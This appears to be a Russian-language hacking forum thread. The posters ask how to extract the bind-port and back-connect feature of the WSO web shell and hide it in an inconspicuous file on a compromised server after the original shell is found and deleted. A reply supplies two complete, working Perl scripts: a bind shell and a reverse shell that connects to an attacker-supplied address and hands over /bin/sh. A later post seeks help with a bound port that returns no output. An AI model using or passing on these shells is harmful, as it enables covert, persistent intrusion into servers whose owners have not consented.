В всо реализован встроенный биндпорт и бэк коннект. Тоесть в темпе создается перловый скрипт, биндится порт и скрипт сносится, так? Как вырезать эту штуку из всо для отдельного использования? Например спалили шелл, удалили. А в какой-то неприметный файлик можно воткнуть этот скрипт. Спасибо.
биндпорт Code: #!/usr/bin/perl $SHELL="/bin/sh -i"; if (@ARGV < 1) { exit(1); } use Socket; socket(S,&PF_INET,&SOCK_STREAM,getprotobyname('tcp')) || die "Cant create socket\n"; setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1); bind(S,sockaddr_in($ARGV[0],INADDR_ANY)) || die "Cant open port\n"; listen(S,3) || die "Cant listen port\n"; while(1) { accept(CONN,S); if(!($pid=fork)) { die "Cannot fork" if (!defined $pid); open STDIN,"<&CONN"; open STDOUT,">&CONN"; open STDERR,">&CONN"; exec $SHELL || die print CONN "Cant execute $SHELL\n"; close CONN; exit 0; } } бек. Code: #!/usr/bin/perl use Socket; $iaddr=inet_aton($ARGV[0]) || die("Error: $!\n"); $paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system('/bin/sh -i'); close(STDIN); close(STDOUT); close(STDERR); посмотрели бы исходники WSO, тела скриптов лежат внутри переменной, кодированные в base64
есть серв с забинденным портом , выбераю telnet , подключаюсь норм, но не выполняются команды , и не выводится результат что делать? был вариант искать рутнутый ssh Но так как нет в наличии таких, отпадает вариант, что посоветуете?